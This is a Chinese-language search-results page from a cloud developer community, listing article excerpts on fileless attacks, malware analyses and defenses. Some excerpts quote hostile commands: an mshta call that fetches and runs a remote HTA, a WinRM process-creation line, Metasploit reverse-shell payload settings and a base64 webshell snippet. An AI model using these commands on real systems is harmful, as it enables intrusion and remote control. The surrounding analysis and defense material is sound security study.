- 综合排序
- 最热优先
- 最新优先
浅谈无文件攻击
浅谈无文件攻击简介与大多数恶意软件不同,“无文件”攻击并不会在目标计算机的硬盘中留下蛛丝马迹,而是直接将恶意代码写入内存或注册表中。由于没有病毒文件,传统基于文件扫描的防病毒软件很难侦测到它们的存在。 然而,“无文件”攻击的定义已经逐渐扩大化,那些需要依靠文件系统的某些功能来实现激活或驻留的恶意软件也已经包括在了“无文件”攻击的范畴中。无文件攻击属于高级持续性威胁(APT)的一种。 APT在无文件攻击之外,还包括0day漏洞利用、缓冲区溢出攻击、傀儡进程等基于内存的攻击,同时还包括内存webshell等攻击,这些攻击可以轻松绕过现有的安全防护体系,将恶意代码悄无声息地植入内存中。 利用注册表利用缓冲区漏洞的无文件攻击有一个弊端就是一旦进程或系统关闭,恶意攻击也就不复存在。 使用内存取证技术,分析内存中的恶意代码,提取攻击的特征和证据,追踪攻击的来源和目的。无文件攻击是一种隐蔽而危险的攻击方式,需要我们提高警惕,加强防护,及时应对。
89710编辑于 2024-03-21- 来自专栏网络安全攻防
无文件落地攻击
文章前言 所谓的"无文件落地攻击"是指恶意程序文件不直接落地到目标系统的磁盘空间中的一种攻击手法,常用于逃避传统的安全检测机制,本篇文章将就此进行简要介绍几种目前比较流行的无文件落地攻击手法。 Step 2:在目标主机上直接执行以下命令实现无文件落地攻击 mshta.exe http://192.168.174.129:8888/OqD8kxY2Z.hta ? 知识拓展 这里介绍一种在内网中常用的无文件落地攻击方法——WinRM无文件落地攻击!!! Windows Server 2012中通过WinRM实施无文件攻击,最终返回一个新的具备较高隐藏度的Windows Sever 2012的shell给我们的攻击主机,以供对内网进行深入拓展和利用 攻击步骤 Step 7:在Windows Server 2012中执行以下命令来实现无文件落地攻击 winrm invoke create wmicimv2/win32_process @{commandline
2.4K40发布于 2021-07-21 - 来自专栏FreeBuf
浅析无文件攻击
写在前面的话 在信息安全领域中,“无文件攻击”属于一种影响力非常大的安全威胁。攻击者在利用这种技术实施攻击时,不会在目标主机的磁盘上写入任何的恶意文件,因此而得名“无文件攻击”。 接下来,我们一起分析一下无文件攻击所采用的攻击方法以及策略,我们会对无文件攻击所涉及到的特定技术进行介绍,并解释为什么这种攻击方式在大多数情况下不会被安全防御系统发现。 其他类型的文档还可以携带PDF和RTF等类型的文件,这种功能属于应用程序的一种特性,所以反病毒技术一般不会干扰其使用。 2、 文档还可以携带漏洞利用代码或Payload。 2、 和恶意可执行程序想必,脚本可以增强反恶意软件产品检测和控制的难度。 3、 脚本可以更加方便攻击者将攻击逻辑分散到多个攻击步骤中实现,以躲避某些基于行为分析的安全检测机制。 虽然在现代网络攻击活动中,无文件攻击只是其中的一种攻击技术,但很多恶意软件一般都会引入一些“无文件攻击”技术来尝试躲避安全产品的检测。
1.1K30发布于 2018-12-28 - 来自专栏FreeBuf
「无文件」攻击方式渗透实验
前几天看了一个文章《全球上百家银行和金融机构感染了一种“无文件”恶意程序,几乎无法检测》,觉得powershell很是神奇,自己希望亲手实验一下,以最大程度还原“无文件”攻击方式。 这套环境里面的192.168.1.108是黑客的kali攻击机,192.168.1.212是黑客的windows攻击机 科普下nishang和PowerSploit 1、Nishang是基于PowerShell 包括了下载和执行、键盘记录、dns、延时命令等脚本 2、PowerSploit是又一款Post Exploitation 相关工具,Post Exploitation是老外渗透测试标准里面的东西,就是获取 PHP_MAKE为 base64_decode($_POST['action']); 连接方式 拿到webshell之后,首先用systeminfo来查看系统信息 首先可以看到这个是一台win2008 r2 * 科普一下csrf的攻击:CSRF:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF,简单来说攻击者盗用了你的身份,以你的名义发送恶意请求
2.7K90发布于 2018-02-23 - 来自专栏FreeBuf
CrowdStrike | 无文件攻击白皮书
1)漏洞利用和漏洞利用工具包,通常通过利用操作系统(OS)或已安装应用程序中存在的漏洞,直接在内存中执行攻击。 2)使用盗用的凭证,是发起无文件攻击的另一种普遍方法。 现在小结一下,本案例中,在不同的攻击阶段所使用的文件技术包括: 初始入侵: 针对Web服务器的SQL注入攻击; 命令与控制(C2): “中国菜刀/直升机”的Web Shell; 提升权限: 使用PowerShell Poweliks调用C2(命令和控制)服务器,攻击者可以从该服务器向受损系统发送进一步的指令。所有这些操作,都可以在没有任何文件写入磁盘的情况下进行。 04 为何传统技术无法抵御无文件攻击 由于传统安全解决方案极难检测到无文件攻击,因此无文件攻击正在增加。让我们来看看,为什么当今市场上的一些端点保护技术,对这些无恶意软件入侵如此脆弱。 由于无文件攻击没有恶意软件,所以AV没有可检测的特征码。 2)基于机器学习(ML)的反恶意软件方法,在应对无文件攻击时,面临着与传统AV相同的挑战。ML动态分析未知文件,并将其区分为好的或坏的。
4.2K41发布于 2020-11-06 - 来自专栏洛米唯熊
利用WinRM实现内网无文件攻击反弹shell
Server2008R2及往上的系统中默认中都开启该服务,从Server2012系统后开始,该WinRM服务便被设置为默认开启。 用Administrator账户登录攻击机器 前提知道被攻击方的用户登录账户密码 Windows操作系统中,默认是开启共享IPC$的 IP:192.168.124.30(server2016) IP 成功 三、在(win7)中需要被远程访问的文件,开启文件共享。 ? 开启共享文件夹,并添加访问用户的权限,使其能够远程访问。 2、把”luomiweixiong.exe”放在(win7)的C盘根目录。 ? 3、kali启动监听shell模式 ? 五、利用(server2016)的WinRM 实现内网无文件攻击反弹shell 1、在(server2016)中执行以下命令 winrm invoke create wmicimv2/win32_process
1.5K20发布于 2019-08-29 - 来自专栏黑白天安全团队
常见的windows下无文件落地攻击手法
什么是无文件攻击? 无文件下对抗传统杀毒软件(AV) 这里我们可以看看一下CrowdStrike中《无文件攻击白皮书》分析的”为何传统技术无法抵御无文件攻击“来快速理解一下无文件落地的意义: 由于传统安全解决方案极难检测到无文件攻击 ,因此无文件攻击正在增加。 2)基于机器学习(ML)的反恶意软件方法,在应对无文件攻击时,面临着与传统AV相同的挑战。ML动态分析未知文件,并将其区分为好的或坏的。 无文件落地攻击的常用手法 一般来说在windows的能执行脚本或命令的组件都可以用来利用进行无文件落地攻击。
7.5K21发布于 2021-03-16 无文件攻击不再隐形,Trellix NDR + Wise 揭示攻击路径并引导修复
无文件横向移动,隐藏于系统信任之中的威胁网络攻击者的战术不断演变,试图绕过安全供应商的防护。如今的攻击者不再依赖传统的恶意软件,而是以“无文件”方式,利用受信任的系统组件,在网络中横向移动。 这种无文件横向移动,用传统的、仅监控终端或文件的安全解决方案很难检测到。攻击者可能使用有效凭证、避免写入磁盘,并伪装成正常的管理行为,使其操作看起来毫无异常。 即使是无文件攻击,也会在网络中留下痕迹。Trellix NDR 可以检测到异常的流量模式、配置错误的服务、可疑的横向移动行为。 图2:检查服务权限访问(Access):攻击者使用 RPC(Remote Procedure Call,远程过程调用)连接到目标机器的 SCM。 图11:执行恶意载荷并将攻击者添加到管理员组图 12 展示了一个使用 SCShell 实现无文件横向移动的示例。
24710编辑于 2025-10-22- 来自专栏FreeBuf
揭秘基于注册表隐藏的无文件攻击
*本文原创作者:ArkTeam 发展 一直以来,文件是恶意代码存在的最常见形式,安全软件也通常把磁盘上的文件作为重点检测对象。然而,一旦恶意代码以无文件形式存储在系统中,便难以对其追踪。 不过,这种基于内存的无文件(Fileless)攻击一旦进程或系统关闭,也就不复存在。 随后,多款恶意程序甚至APT组织使用这种无文件持久化攻击技术。 ? 攻击流程 ? 2、无实体恶意代码注册表执行 通常,恶意代码被创建为几个注册表子键,每个键值中会分别存储脚本代码或者二进制数据,自启动后,通过层层解密,最终执行核心代码。 a)第一阶段键值Auto-Start ? 结束语 基于注册表的无文件攻击利用操作系统特性来达到数据隐藏的意图,并将恶意程序运行在合法进程之中,这种方式能让基于文件监测的查杀手段失效,为此安全厂商们也积极做出响应,然而随着技术的进一步发展,恶意代码的隐藏方式很可能并不只局限于
2.1K50发布于 2018-02-08 - 来自专栏Python和安全那些事
恶意代码分析:2.LNK文件伪装成证书传播RokRAT恶意软件(含无文件攻击)
这篇文章将翻译一篇LNK文件发起的恶意攻击,主要是LNK文件伪装成证书执行RokRAT恶意软件,并利用Powershell命令发起无文件攻击和执行相关行为。基础性技术文章,希望您喜欢! 受感染的文本编辑器notepad++ [译文] 恶意代码分析:2.LNK文件伪装成证书传播RokRAT恶意软件(含无文件攻击) 声明:本人坚决反对利用工具或渗透技术进行犯罪的行为,一切犯罪行为必将受到严惩 、search.dat、find.bat 发起RokRAT无文件攻击,利用云端API收集用户信息 更详细的描述如下: (1)当LNK文件被执行时,它会运行PowerShell命令来创建并执行一个合法的文档文件 如下图所示,创建了一个韩文的合法文档,旨在干扰被攻击者。 (2)随后,它在%public%文件夹中创建了3个文件。 接着,“search.dat”以无文件攻击的方式读取并执行“viewer.dat”文件。
91110编辑于 2024-05-17 - 来自专栏公共互联网反网络钓鱼(APCN)
基于SVG文件的新型无文件攻击路径分析与防御体系构建研究
然而,其内嵌脚本与动态加载能力亦被攻击者利用,形成一种新型的“双用途”攻击载体。近期VirusTotal平台披露44个零检测恶意SVG样本,暴露了传统安全检测机制在图像类文件处理上的结构性盲区。 本文系统分析此类攻击的技术原理、传播路径与规避机制,指出其利用内联脚本、事件触发与资源外链实现无文件载荷投递的攻击范式。 关键词: SVG安全;无文件攻击;零检测样本;内容安全策略;攻击检测盲区;网络安全防御1. 引言在现代网络安全防御体系中,文件类型识别与恶意代码扫描是威胁检测的基础环节。 2. SVG技术特性与安全风险分析2.1 SVG的技术架构与功能扩展SVG是一种基于XML的二维矢量图形描述语言,由W3C标准组织制定,广泛用于Web前端、移动应用与文档嵌入场景。 规避检测机制:文件扩展名为.svg,MIME类型为image/svg+xml,多数安全代理默认信任;内容为纯文本,无PE结构或典型恶意文件特征;脚本经混淆或延迟执行,静态扫描难以识别语义。
39610编辑于 2025-10-30 - 来自专栏FreeBuf
SQL Server Transact-SQL 的无文件攻击姿势
背景概述 近日,深信服安全团队捕获到一起绕过杀毒软件的无文件攻击事件,被入侵的主机或服务器会被安装Mykings、Mirai、暗云等多种僵尸网络木马及挖矿程序,并且难以彻底清除。 排查过程 排查主机上的恶意文件、启动项等,发现执行恶意脚本的WMI,功能是下载文件到本地执行: ? ? 顺手逛一下查杀到恶意exe文件的目录,发现两个dvr后缀的文件,打开一看果不其然,包含了用于下载恶意文件的命令: ? ? 病毒文件分析 将十六进制数据拷贝出来转换为PE文件,是一个用C#编写的DLL文件,通过MyDownloadFile方法读取指定URL网页的内容: ? 解决方案 1.删除SQL Server中的恶意作业和存储过程; 2.删除主机中存在的恶意程序、WMI、注册表项等,详见下表: ? 3.
1.3K10发布于 2019-05-21 - 来自专栏Khan安全团队
无文件PELoader
https://github.com/TheD1rkMtr/FilelessPELoader
65830编辑于 2023-02-23 - 来自专栏渗透云笔记
PDF文件攻击
2. 调用模块 use exploit/windows/fileformat/adobe_cooltype_sing/ 3. 使用handler监听模块 use exploit/multi/handler 2. 回弹一个tcp连接 set payload windows/meterpreter/reverse_tcp 3. 2.使用migrate将进程迁移至notepad上,保持连接状态。 ? ? 3.查看连接状态 netstat -a ? 至此整个过程结束,成功拿到shell。 但这类漏洞因为PDF沙箱的原因也有着很大的局限性,往往是需要配合系统的提权漏洞一起使用才能进行完整的攻击过程,所以投入的成本较高在这几年来出现的完整攻击样本较少。 所以平时要小心陌生的文件,在打开前要明确来源,或使用杀毒软件进行杀毒。尽量保证电脑的软件处于最新版本,这样才能最大程度较低被攻击的概率。
2.9K30发布于 2020-03-12 - 来自专栏公共互联网反网络钓鱼(APCN)
基于浏览器通知的无文件C2攻击机制与防御体系研究——以Matrix Push为例
摘要近年来,无文件攻击(Fileless Attack)因其高隐蔽性与低检测率成为高级持续性威胁(APT)的重要技术路径。 关键词:无文件攻击;C2框架;浏览器通知;Web Push API;权限滥用;持久化通信;纵深防御1 引言随着终端防护能力的提升,攻击者正加速转向利用操作系统或应用程序原生功能实施“合法外衣”式攻击。 全文结构如下:第二部分综述无文件攻击与浏览器API滥用的发展脉络;第三部分详细拆解Matrix Push的攻击流程与C2架构;第四部分分析现有防御机制的失效原因;第五部分提出多层防御方案并辅以代码实现; 2 无文件攻击与浏览器API滥用的演进2.1 无文件攻击的技术谱系无文件攻击并非新概念,其典型形式包括:内存驻留型:如PowerShell Empire,将恶意载荷加载至内存执行;注册表/启动项注入:将脚本嵌入 6 结论Matrix Push C2代表了无文件攻击与合法Web API滥用的深度融合。
27910编辑于 2025-12-19 - 来自专栏安全领域
关于新型的无文件网络攻击,你需要知道的5件事
这些攻击有着许多的名字,“无文件攻击”是最常见的一种方式,但也会用"非恶意软件攻击"和"伪装攻击"(适应性攻击)。 所以,这些攻击很快就成为了IT和信息安全专业人员的头号威胁。 为了更加清楚了解无文件攻击的构成和工作原理,下面是每个业务负责人应该知道的5件事: 1.无文件攻击利用的是网络端口安全上的一个基本漏洞。 相关文章:各种形式的网络钓鱼对小企业的威胁 2.攻击者可以使用各种无文件技术。 在较高的层面上,攻击可以分为两个主要阶段:初始攻击让攻击者能够访问目标系统,以及攻击者在目标电脑上进行的开发活动。 从这里开始,攻击者使用PowerShell直接在内存中执行恶意代码,使得攻击真正无文件化。 5.预防无文件攻击。 虽然无文件技术极难检测,但可以采取一些措施来保护业务并降低风险。好的第一步是禁用组织未主动使用的管理工具,或者至少限制其权限和功能。
70220发布于 2018-08-01 - 来自专栏前沿安全技术
针对Model X无钥匙系统的远程攻击
本研究是针对特斯拉 Model X 无钥匙系统的实用安全评估。所分析的无钥匙系统采用了由通用标准认证的安全元件实现的安全对称密钥和公钥密码原语。 遥控钥匙可用于通过按下按钮来锁定和解锁汽车,这被称为远程无钥匙进入 (RKE,Remote Keyless Entry)。 这些示例表明,Model X遥控钥匙上的OAD服务缺陷可能允许攻击者覆盖固件并获得远程代码执行。Toolbox 软件可以用于更新遥控钥匙固件,因此它包含了最新固件二进制文件的备份。 从这个实验中可以清楚地看出,遥控钥匙没有验证提供的固件二进制文件的真实性。这种不安全的固件更新(或 OAD)实现允许攻击者覆盖 CC2541 SoC 执行的固件。 生成恶意固件映像后,更新了 CRC 和 SHA1 哈希以获得有效的固件二进制文件,该文件可以在攻击的第二步中与 OAD 一起使用。
1.4K31编辑于 2023-06-24 - 来自专栏FreeBuf
无文件加密挖矿软件GhostMiner
早在2017年,已经观察到他们如何应用无文件技术使检测和监测更加困难。 8月观察到一个名为ghostminer的无文件加密货币挖掘恶意软件,该软件利用无文件技术和windows管理工具(wmi)。 还观察到GhostMiner 变体修改了被Mykings、PowerGhost、PCASTLE和BuleHub等感染的主机文件。 \ROOT\subscription:__EventFilter.Name=”PowerShell Event Log Filter” EventNamespace : root\cimv2 Query 除了上述功能外,命令脚本还有一个wmi_killer函数,该函数终止正在运行的进程,并删除与恶意软件系相关联的计划任务和服务,例如: 1.Mykings 2.PowerGhost 3.PCASTLE 4 然后ghostminer将追加2130字节的随机值,该文件将保存为C:\windows\temp\lsass.exe。 恶意软件随后将执行以下命令: ? IOCs ?
1.8K00发布于 2019-10-10 - 来自专栏卓越笔记
Linux scp 无密码复制文件
目的:本地服务器(local)复制文件到远程服务器(remote) 本地服务器:local 远程服务器:remote (192.168.1.254) 1. 在 local 上运行 ssh-keygen -t rsa 在 /root/.ssh 下生成 id_rsa 和 id_rsa.pub 两个文件 2. 在 local 上运行 ssh-keygen -t rsa 在 /root/.ssh 下生成 id_rsa 和 id_rsa.pub 两个文件 4. 使用 cat id_rsa.pub.L >> authorized_keys 把 local 的 公钥 写入到 authorized_keys 文件中 6. 然后在 local 上就可以无密码使用 scp 复制文件到 remote 了(scp <file> root@192.168.1.254:/home/downloads)
6.4K50编辑于 2023-02-18 - 来自专栏FreeBuf
Netwalker无文件勒索软件分析
攻击者正不断研究更复杂的方式逃避恶意软件检测,近期发现攻击者利用PowerShell编写Netwalker勒索软件,直接在内存中执行,没有将实际的勒索软件二进制文件存储到磁盘中。 最后删除副本,防止受害者使用副本恢复文件。 ? 无文件勒索软件分析 Netwalker使用6个随机字符作为扩展名重命名加密文件: ? 它通常会避免对关键文件,可执行文件,动态链接库,注册表或其他与系统相关的文件进行加密,防止系统完全失效。 总结与建议 攻击者现在正在向勒索软件中添加反射DLL注入,从而使攻击难以被安全分析人员分析追踪。勒索软件本身对组织就具有很大的危害,成为无文件攻击后,其风险再次加大。 以下是避免被勒索软件攻击的一些建议: 定期备份关键数据,减轻勒索软件攻击的影响; 安装来自操作系统和第三方供应商的最新软件补丁; 遵守良好的邮件和网站安全规范; 及时发现警告可疑的电子邮件和文件; 在端点上实施应用程序白名单
1.6K20发布于 2020-06-20
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号